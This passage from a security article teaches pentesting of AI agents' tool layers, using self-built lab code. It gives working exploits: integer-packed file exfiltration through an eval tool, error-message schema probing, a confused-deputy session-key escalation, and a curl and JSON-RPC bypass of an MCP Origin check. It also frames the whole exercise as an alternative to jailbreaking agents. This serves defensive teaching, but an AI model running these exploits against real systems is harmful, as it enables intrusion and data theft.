The reliable bugs in AI agents are not in the model. They live in the tool layer behind it, and they are the same bugs we have been exploiting for twenty years. Here are five of them, with working code, a lab you can build, and a methodology you can run on Monday.

The blind spot
Open any AI security feed today and you will see the same thing on a loop. Someone talked a chatbot into saying something it should not. Someone found a clever phrasing that slipped past a safety filter. Screenshots of jailbreaks, essays about prompt injection, a new “DAN” every week.
Prompt injection is a genuine problem and I am not dismissing it. But it has quietly become a blind spot, because while the whole industry is busy trying to persuade the model, the most reliable way to break an AI agent is to ignore the model entirely and attack the code behind it.
Prompt injection is probabilistic. It depends on the model, the system prompt, the temperature, the phase of the moon. It gets patched, filtered, and retrained against. The bugs I want to show you are the opposite. They are deterministic. They work every time. They do not care which model is behind the endpoint, because the model is not where they live.
Here is the reframe this whole article argues for: a modern AI agent is not one thing. It is a language model wired to a set of tools, and those tools are ordinary software. File readers, calculators, cache handlers, HTTP fetchers, database queries, protocol servers. The model is just the router that decides which tool to call with what arguments. And the tool layer fails the way all software has always failed, through type confusion, error oracles, insecure data handling, missing authorization, excessive privilege, and misplaced trust in a transport.
None of that requires you to outwit a neural network. It requires you to do what you already know how to do, pointed at a layer almost nobody is testing.
Stop trying to jailbreak the agent. Pentest it.
What an agent actually is, from an attacker’s chair
Forget the marketing diagram with the glowing brain. Draw the real one.
On one side you have the model. On the other side you have a row of tools, each of which is a function with a signature: parameters in, a result out, and side effects in the middle. Between them sits an orchestrator that takes the model’s chosen tool call, executes it, and feeds the result back.
To an attacker, every one of those tools is an undocumented API endpoint. The model is just an unusually chatty proxy sitting in front of them. And here is the key move: you do not have to go through the model. In almost every real deployment you can reach the tool layer more directly, through the protocol, through the transport, through an upload endpoint, through the orchestrator’s own API. The model’s “guardrails” are irrelevant to a request that never passes through the model.
So the mental model for the rest of this article is simple. The agent is a web app wearing a costume. We are going to take the costume off.
The model gets the headlines. The plumbing gets the shells.
Threat model (read this before the fun part)
Everything below assumes a single, deliberately weak attacker:
- Can reach the tool interface, directly or through the agent.
- Cannot modify the model, its weights, or its system prompt.
- Has no special privileges to start with.
- Reads error messages. Sends malformed input. Thinks like a pentester.
That is a weaker attacker than the prompt-injection threat model, which usually assumes you can get crafted text into the model’s context. Weaker attacker, same impact, means these bugs are more dangerous, not less, because they ask for less.
Every exploit in this article is deterministic and reproducible. Not one of them involves “convincing” the model of anything.
A note on ethics before we start: every technique here should only be run against systems you own or are explicitly authorized to test, with findings disclosed responsibly. The code below is written against small, self-contained vulnerable implementations I wrote for this article, so you can build the whole thing in a lab (there is a section at the end on exactly that) without touching anyone else’s system.
Pattern 1: output filters that validate type, not content
A common guardrail on an agent tool is an output filter. The tool is allowed to return some kinds of values and not others. A frequent, flawed version only checks the type of the result. Numbers are fine. Raw file contents are not.
Here is a calculator-style tool with exactly that defense:
# Vulnerable tool
def calculator_tool(expr: str):
result = eval(expr) # the sink
if not isinstance(result, (int, float)): # the "guardrail"
return {"error": "Output format not supported"}
return {"result": result}
The author believes the type check contains the eval. "Sure, there is an eval," they reason, "but an attacker can only ever get a number back, and a number cannot leak the flag."
That reasoning confuses shape with meaning. A type check constrains the shape of the output. It says nothing about how much information that shape can carry, and an integer can carry an unbounded amount.
Watch it come apart in three steps.
First, confirm the sink and the filter behave as expected.
# expr = "1+1" -> {"result": 2} sink works
# expr = "open('flag.txt').read()" -> {"error": ...} strings are blocked
# expr = "len(open('flag.txt').read())"-> {"result": 11} ints pass, file existsThe length probe already tells you the file is there and readable, and that integers sail through. Now stop fighting the filter and feed it exactly what it wants: a single, very large integer that happens to be the entire file.
# Exploit: pack the whole file into one integer
payload = "int.from_bytes(open('flag.txt','rb').read(),'big')"
# tool returns {"result": 24589...a huge integer...}
Then unpack it offline, on your side, where no filter is watching.
n = 24589_000_the_big_integer_000
data = n.to_bytes((n.bit_length() + 7) // 8, "big")
print(data.decode()) # the full file contents
The filter did exactly what it was told. It was told the wrong thing.

This generalizes far past integers. Any allowed output type that can encode arbitrary data is a smuggling channel: a float via its bit pattern, a boolean leaked one bit per query, a list length, an HTTP status code, the number of results returned. If any serialization of the data passes the filter, all of the data passes.
The fix is the boring correct one. Do not expose an eval sink at all. If a tool must return computed values, validate output by content and provenance, not by type: does this value derive only from permitted sources. And treat "the result is shaped like something safe" as meaningless, because shape is not meaning.
Pattern 2: error messages as a schema oracle
Agent tools almost always have a hidden contract. Required parameters. Allowed enum values. Internal state they expect to be in. Developers lean on that contract being undocumented, as if obscurity were access control.
It is not, and attackers rebuild hidden contracts the same way they always have: send malformed input, read the error, repeat. This is blind SQL injection energy, verbose-error recon, the oldest game there is. The only new part is that the endpoint happens to be a tool exposed to a language model.
Here is a tool that is “helpful” with its errors:
# Vulnerable tool with talkative validation
def process_task(params: dict):
if "cache_task_id" not in params:
raise ValueError("missing required field: cache_task_id")
if params.get("status") != "SAFE":
raise ValueError("status must be SAFE to proceed")
key = INTERNAL_KEYS[params["cache_task_id"]] # KeyError leaks the key format
...
Three probes reconstruct the entire interface, and then some.
send {} -> "missing required field: cache_task_id"
(you now know a field name)
send {"cache_task_id": "x"} -> "status must be SAFE to proceed"
(a second field, an allowed value, a state machine)
send {"cache_task_id": "x", -> KeyError: 'x'
"status": "SAFE"} and a traceback exposing the key format
GRANT_ROOT_READ_FOR_SESSION_<n>
(an internal privileged secret format)Three malformed requests gave up a field name, a second field, an enum value, an implied state machine, and the exact format of an internal privileged key. Hold on to that last one. It becomes the ammunition for Pattern 3.

The fix is as old as the attack. Fail closed. Log the detail server-side where only you can read it. Return a generic, opaque error to the caller. A stack trace is a love letter to an attacker.
Pattern 3: tool input trusted straight into a privileged slot
The highest-impact agent bugs I have seen are also the dullest. A tool takes attacker-controlled input and drops it, unvalidated, into something privileged.
Picture a multi-agent system: a coordinator fronting a few worker agents, a privileged read_root_flag that only works for an elevated session, and a cache tool that is supposed to store structured updates.
# Vulnerable: assigns raw uploaded bytes verbatim as a session capability key
def process_cache_update(cache_task_id: str, target_session: int):
blob = UPLOADS[cache_task_id] # attacker-controlled file bytes
SESSION_KEYS[target_session] = blob # assigned verbatim, never parsed
return {"status": "updated"}
def read_root_flag(session_id: int):
# ADMIN_GRANT = b"GRANT_ROOT_READ_FOR_SESSION_778"
if SESSION_KEYS.get(session_id) == ADMIN_GRANT:
return open("/root/flag").read()
return {"error": "insufficient privilege"}
The tool is named process_cache_update, which implies it parses a structured cache update. It does not. It copies the raw bytes of your uploaded file straight into a session's capability slot. Combine that with the key format you leaked in Pattern 2, and the chain writes itself.
# 1. upload a file whose entire body is the bare grant string
upload("payload", b"GRANT_ROOT_READ_FOR_SESSION_778")
# 2. have the cache tool assign those raw bytes as session 778's key
process_cache_update(cache_task_id="payload", target_session=778)
# 3. read the flag as the now-privileged session 778
read_root_flag(session_id=778) # -> the root flag

This is a textbook confused deputy. A low-privilege path (upload a file, call a cache tool) drives a privileged operation (grant elevated session access). The research community formalized exactly this for multi-agent LLM systems in a January 2026 paper on privilege escalation in agent systems, and Johann Rehberger documented a cross-agent privilege escalation vector in late 2025. What is worth noticing is that almost all of that work frames the entry point as prompt injection: one agent gets injected and manipulates another through natural language.
This chain never touches the model. The bug is insecure object handling, and the exploit is pure data.
The fix is to parse and validate every tool parameter as structured, untrusted input, and to never assign caller-supplied bytes into an authorization slot. Capability tokens should be minted and checked by the server, never supplied by the caller. Least privilege on every tool, so that even a successful write cannot reach /root/flag.
Pattern 4: the transport trusts a header the client controls
Agents increasingly talk to their tools over the Model Context Protocol (MCP), and MCP is where classic transport and protocol bugs are reappearing at high speed.
Here is one that keeps coming back. A server tries to stop browser-based abuse (think DNS rebinding, or a malicious website driving a localhost MCP server) by checking the Origin header. The logic assumes the caller is a browser, because browsers always attach Origin to cross-site requests and scripts cannot suppress it.
# Vulnerable MCP endpoint guard
@app.post("/mcp")
def mcp(req):
origin = req.headers.get("Origin")
if origin and origin not in ALLOWLIST:
return 403, "Invalid Origin header"
# a malicious website's fetch() always sends Origin, so it is blocked...
return handle_jsonrpc(req)
Read the condition carefully: it only blocks when Origin is present and disallowed. The entire defense rests on the attacker being a browser. A direct client is not a browser. It simply does not send the header.
# Exploit: omit Origin entirely, bring valid session cookies, speak JSON-RPC directly
curl -s https://target/mcp \
-b cookie.txt \
-H 'Content-Type: application/json' \
-d '{"jsonrpc":"2.0","id":1,"method":"initialize","params":{"protocolVersion":"2025-06-18","capabilities":{}}}'
# handshake succeeds, because Origin is absent, not disallowed
From there you enumerate and act, even when the agent’s own UI swore there were no tools available.
{"method":"resources/list"} -> resource://flag (locked), plus a decoy
{"method":"tools/list"} -> unlock_flag (the UI lied)
{"method":"tools/call", "params":{"name":"unlock_flag"}}
{"method":"resources/read","params":{"uri":"resource://flag"}} -> flag
This is a 2010-era web bug, trusting a spoofable, optional header, running in 2026 AI infrastructure. And it is not an isolated curiosity. A 2025 study of more than 280 popular MCP servers found risk compounding sharply as systems chain multiple servers together. An April 2025 paper demonstrated major exploits across MCP deployments and shipped an auditing scanner. A run of CVEs through 2025 assigned command injection and related flaws to real, widely used MCP servers. Most of these are not AI bugs at all. They are authentication, isolation, and transport-trust failures wearing an AI badge.
It helps to see where the transport sits in the overall MCP picture. Hosts run clients, clients speak JSON-RPC to servers over stdio or HTTP, and the servers are what actually touch your files, APIs, and databases. The transport layer, the thing Pattern 4 abuses, is the connective tissue in the middle: